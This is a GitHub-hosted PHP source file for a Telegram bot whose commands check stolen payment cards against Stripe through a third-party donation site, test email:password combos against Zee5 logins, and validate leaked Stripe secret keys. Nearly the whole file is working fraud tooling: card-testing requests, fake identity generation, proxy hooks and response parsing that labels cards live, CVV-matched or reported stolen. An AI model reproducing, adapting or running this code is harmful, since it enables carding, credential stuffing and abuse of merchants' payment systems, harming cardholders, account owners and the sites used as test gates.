-
Notifications
You must be signed in to change notification settings - Fork 11
/
aamir-bot.php
375 lines (340 loc) · 19.7 KB
/
aamir-bot.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
<?php
#----------------- [BOT RAW BY AAMIR] --------------------------#
#------------------[ Version 1.0 ] ------------------------#
$botToken = ""; # ENTER HERE BOT TOKEN
$website = "https://api.telegram.org/bot".$botToken;
error_reporting(0);
$update = file_get_contents('php://input');
$update = json_decode($update, TRUE);
$print = print_r($update);
$chatId = $update["message"]["chat"]["id"];
$gId = $update["message"]["from"]["id"];
$userId = $update["message"]["from"]["id"];
$firstname = $update["message"]["from"]["first_name"];
$username = $update["message"]["from"]["username"];
$message = $update["message"]["text"];
$message_id = $update["message"]["message_id"];
#--------------------[Private Command]---------------------# IF YOU NOT WANT THAT COMMAND THEN REMOVE
$mainid = (array("1569782681,1569782681")); #PUT HERE USERID
if (in_array($chatId, $mainid) === false){
$freeusermsg = urlencode ("Premium Declined!");
sendMessage($chatId,$freeusermsg, $message_id);
return;
}
# Id Status By Aamir
function checkId($userId){
$mainids = array("1569782682,1569782682"); #PUT HERE Premium USERID
if($userId == "1569782681"){#Add Here Your Id if ur owner
$show = "Owner";
}
elseif(in_array($userId, $mainids) === true){
$show = "Premium";
}
else{
$show = "Free";
}
return $show;
}
$myid = checkId($userId); #Use $myid where u want
#------------------[Start]-------------#
if ((strpos($message, "!start") === 0)||(strpos($message, "/start") === 0)){
sendMessage($chatId, "<i>Hello $firstname now you can use /cmds%0A%0ABot Made by Aamir </i>");
}
#----------- [ COMMANDS ] --------#
elseif ((strpos($message, "!cmds") === 0)||(strpos($message, "/cmds") === 0)){
sendMessage($chatId, "<i>BIN: /bin 461046%0AINFO: /info Know Yourself%0ASK CHECK: /sk sk_xyz%0ASTRIPE GATE: /ass cc|mon|yy|cvv%0AZee5 Checker: /zee5 mail:pass%0A%0ABot Made by Aamir </i>");
}
#------------[User Info]---------#
elseif ((strpos($message, "!info") === 0)||(strpos($message, "/info") === 0)){
sendMessage($chatId, "<i>YOUR ID: <code>$userId</code>%0AFirst Name: $firstname%0AUsername: @$username%0A%0ABot Made by Aamir </i>");
}
#---------------[BIN CODE]------------------#
elseif ((strpos($message, "!bin") === 0)||(strpos($message, "/bin") === 0)){
$bin = substr($message, 5);
function GetStr($string, $start, $end){
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];
};
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$bin.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);
$bank = GetStr($fim, '"bank":{"name":"', '"');
$name = GetStr($fim, '"name":"', '"');
$brand = GetStr($fim, '"brand":"', '"');
$country = GetStr($fim, '"country":{"name":"', '"');
$emoji = GetStr($fim, '"emoji":"', '"');
$scheme = GetStr($fim, '"scheme":"', '"');
$type = GetStr($fim, '"type":"', '"');
$currency = GetStr($fim, '"currency":"', '"');
if(strpos($fim, '"type":"credit"') !== false){
$bin = 'Credit';
}else{
$bin = 'Debit';
}
curl_close($ch);
curl_close($ch);
sendMessage($chatId, '<i>Bin Data ✓</i>%0A%0A<i>Bank: '.$bank.' </i>%0A<i>Country:</i><i> '.$name.''.$emoji.' </i>%0A<i>Brand: '.$brand.' </i>%0A<i>Card: '.$scheme.' </i>%0A<i>Type: '.$type.' </i>%0A<i>Currency: '.$currency.' </i>%0A<i>Checked By: @'.$username.' </i>%0A%0A<i>BOT MADE BY </i><b>@Aamir_2x</b>');
}
curl_close($ch);
#---------------------------[ GATE 1 CHECKER ]-----------------------#
if ((strpos($message, "!ass") === 0)||(strpos($message, "/ass") === 0)){
$lista = substr($message, 5);
$i = explode("|", $lista);
$cc = $i[0];
$mes = $i[1];
$ano = $i[2];
$ano1 = substr($yyyy, 2, 4);
$cvv = $i[3];
error_reporting(0);
date_default_timezone_set('Asia/Jakarta');
if ($_SERVER['REQUEST_METHOD'] == "POST"){
extract($_POST);
}
elseif ($_SERVER['REQUEST_METHOD'] == "GET"){
extract($_GET);
}
function GetStr($string, $start, $end){
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];
};
$separa = explode("|", $lista);
$cc = $separa[0];
$mes = $separa[1];
$ano = $separa[2];
$cvv = $separa[3];
#-----------------------[BIN INFO]--------------#
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);
$bank1 = GetStr($fim, '"bank":{"name":"', '"');
$name2 = GetStr($fim, '"name":"', '"');
$brand = GetStr($fim, '"brand":"', '"');
$country = GetStr($fim, '"country":{"name":"', '"');
$emoji = GetStr($fim, '"emoji":"', '"');
$name1 = "".$name2."".$emoji."";
$scheme = GetStr($fim, '"scheme":"', '"');
$type = GetStr($fim, '"type":"', '"');
$currency = GetStr($fim, '"currency":"', '"');
if(strpos($fim, '"type":"credit"') !== false){
$bin = 'Credit';
}else{
$bin = 'Debit';
}
curl_close($ch);
#----------------[ RANDOM INFO ]----------------#
$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
$firstname = $matches1[1][0];
preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
$lastname = $matches1[1][0];
preg_match_all("(\"email\":\"(.*)\")siU", $get, $matches1);
$email = $matches1[1][0];
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
$zip = $matches1[1][0];
//
# -------------------- [1 REQ] -------------------#
$ch = curl_init();
//curl_setopt($ch, CURLOPT_PROXY, $socks5);
//curl_setopt($ch, CURLOPT_PROXYUSERPWD, $rotate);
curl_setopt($ch, CURLOPT_URL, '');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'authority: api.stripe.com',
'method: POST',
'path: /v1/payment_methods',
'scheme: https',
'accept: application/json',
'accept-language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,hi;q=0.6',
'content-type: application/x-www-form-urlencoded',
'origin: https://js.stripe.com',
'referer: https://js.stripe.com/',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-site',
'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',
));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
# ----------------- [1req Postfields] ---------------------#
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$result1 = curl_exec($ch);
$id = trim(strip_tags(getStr($result1,'"id": "','"')));
# -------------------- [2 REQ] -------------------#
$ch = curl_init();
//curl_setopt($ch, CURLOPT_PROXY, $socks5);
//curl_setopt($ch, CURLOPT_PROXYUSERPWD, $rotate);
curl_setopt($ch, CURLOPT_URL, 'https://rccggraceassembly.org/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'authority: ',
'method: ',
'path: ',
'scheme: https',
'accept: ',
'accept-language: en-US,en;q=0.9',
'content-type: ',
'cookie: ',
'origin: ',
'referer: ',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-origin',
'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',
));
# ----------------- [2req Postfields] ---------------------#
curl_setopt($ch, CURLOPT_POSTFIELDS,'');
$result2 = curl_exec($ch);
$cvc_check = trim(strip_tags(getStr($result2,'"cvc_check":"','"')));
$info = curl_getinfo($ch);
$time = $info['total_time'];
$httpCode = $info['http_code'];
$time = substr($time, 0, 4);
curl_close($ch);
#---------------------------------------------[ RESPONSES ]------------------------------------#
if ((strpos($result2, 'incorrect_zip')) || (strpos($result2, 'Your card zip code is incorrect.')) || (strpos($result2, 'The zip code you supplied failed validation.'))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Approved</b>%0A<b>Response:</b> <b> CVV MATCHED </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, '"cvc_check":"pass"')) || (strpos($result2, "Thank You.")) || (strpos($result2, '"status": "succeeded"')) || (strpos($result2, "Thank You For Donation.")) || (strpos($result2, "Your payment has already been processed")) || (strpos($result2, "Success ")) || (strpos($result2, '"type":"one-time"')) || (strpos($result2, "/donations/thank_you?donation_number="))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Approved</b>%0A<b>Response:</b> <b> CVV MATCHED </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, 'Your card has insufficient funds.')) || (strpos($result2, 'insufficient_funds'))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Approved</b>%0A<b>Response:</b> <b> CCN LIVE - Insufficient Funds </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, "Your card's security code is incorrect.")) || (strpos($result2, "incorrect_cvc")) || (strpos($result2, "The card's security code is incorrect."))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Approved</b>%0A<b>Response:</b> <b> CCN MATCHED </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, "Your card does not support this type of purchase.")) || (strpos($result2, "transaction_not_allowed"))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Approved</b>%0A<b>Response:</b> <b> CCN MATCHED - Card Doesnt Support Purchase </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, "pickup_card")) || (strpos($result2, "lost_card")) || (strpos($result2, "stolen_card"))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Approved</b>%0A<b>Response:</b> <b> Pickup Card 「Reported Stolen Or Lost」 </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif (strpos($result2, "do_not_honor")){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Declined : Do_Not_Honor </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, 'The card number is incorrect.')) || (strpos($result2, 'Your card number is incorrect.')) || (strpos($result2, 'incorrect_number'))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Incorrect Card Number </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, 'Your card has expired.')) || (strpos($result2, 'expired_card'))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Expired Card </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif (strpos($result2, "generic_decline")){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Declined : Generic_Decline </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif (strpos($result1, "generic_decline")){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Declined : Generic_Decline </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, '"cvc_check":"unavailable"')) || (strpos($result2, '"cvc_check": "unchecked"')) || (strpos($result2, '"cvc_check": "fail"'))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Security Code Check : '.$cvc_check.' [Proxy Dead/change IP] </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}
elseif ((strpos($result2, "Your card was declined.")) || (strpos($result2, 'The card was declined.'))){
sendMessage($chatId, '<b>Card:</b> <code>'.$lista.'</code>%0A<b>Status:</b> <b>Dismiss</b>%0A<b>Responce:</b> <b> Card Declined </b>%0A<b>Bank:</b> '.$bank1.'%0A<b>Country:</b> '.$name1.'%0A<b>Brand:</b> '.$brand.'%0A<b>Card:</b> '.$scheme.'%0A<b>Type:</b> '.$type.'%0A<b>Gateway:</b> <b>Stripe</b>%0A<b>Checked By:</b> @'.$username.'<b>%0ATime Taken:</b> <b>'.$time.'s</b>%0A%0A<b>Bot Made by Aamir </b>');
}elseif(!$result2){
sendMessage($chatId, ''.$result2.'');
}else{
sendMessage($chatId, ''.$result2.'');
}
curl_close($ch);
}
#----------------[ Zee5 ]------------------#
if (strpos($message, "/zee5") === 0){
$combo = substr($message, 6);
error_reporting(0);
set_time_limit(0);
error_reporting(0);
date_default_timezone_set('Asia/Kolkata');
$date1 = date('yy-m-d');
function multiexplode($delimiters, $string){
$one = str_replace($delimiters, $delimiters[0], $string);
$two = explode($delimiters[0], $one);
return $two;
};
$email = multiexplode(array(":", "|", ""), $combo)[0];
$pass = multiexplode(array(":", "|", ""), $combo)[1];
function GetStr($string, $start, $end){
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];
};
$resultmann = file_get_contents('https://userapi.zee5.com/v1/user/loginemail?email='.$email.'&password='.$pass.'');
$token = trim(strip_tags(GetStr($resultmann,'{"token":"','"}')));
if($token){
sendMessage($chatId, "<b>ZEE5 Account:</b>%0A<b>EMAIL:PASS</b> <code>$combo</code>%0A<b>Response:</b> <b>Successfully Logged in</b>%0A<b>Checked By:</b> @$username%0A%0A<i>Bot Made by Aamir</i>");
}else{
sendMessage($chatId, "<b>Combo:</b> <code>$combo</code>%0A<b>Response:</b> <b>Wrong Email or Password</b>%0A<b>Checked By:</b> @$username%0A%0A<i>Bot Made by Aamir</i>");
};
curl_close($ch);
ob_flush();
}
#-------------------[Sk Key Check Command]---------------------#
elseif ((strpos($message, "!sk") === 0)||(strpos($message, "/sk") === 0)){
$sec = substr($message, 4);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/tokens');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "card[number]=5154620061414478&card[exp_month]=01&card[exp_year]=2023&card[cvc]=235");
curl_setopt($ch, CURLOPT_USERPWD, $sec. ':' . '');
$headers = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
if (strpos($result, 'api_key_expired')){
sendMessage($chatId, "<i>DEAD KEY</i>%0A<i>KEY:</i> <code>$sec</code>%0A<i>REASON:</i> EXPIRED KEY%0A%0A<b>Bot Made by Aamir </b>");
}
elseif (strpos($result, 'Invalid API Key provided')){
sendMessage($chatId, "<i>DEAD KEY</i>%0A<i>KEY:</i> <code>$sec</code>%0A<i>REASON:</i> INVALID KEY%0A%0A<b>Bot Made by Aamir </b>");
}
elseif ((strpos($result, 'testmode_charges_only')) || (strpos($result, 'test_mode_live_card'))){
sendMessage($chatId, "<i>DEAD KEY</i>%0A<i>KEY:</i> <code>$sec</code>%0A<i>REASON:</i> Testmode Charges Only%0A%0A<b>Bot Made by Aamir★ </b>");
}else{
sendMessage($chatId, "<i>LIVE KEY</i>%0A<i>KEY:</i> <code>$sec</code>%0A<i>Message: </i> SK LIVE%0A%0A<b>Bot Made by Aamir </b>");
}}
#----------------------------------------------#
function sendMessage ($chatId, $message){
$url = $GLOBALS[website]."/sendMessage?chat_id=".$chatId."&text=".$message."&reply_to_message_id=".$message_id."&parse_mode=HTML";
file_get_contents($url);
}
#------- VERSION 1.0
#------- GITHUB
#------- POWERED BY MAKEPOSSIBLEX
#------------------------------------------------------ BOT RAW MADE BY AAMIR -----------------------------------------------#
?>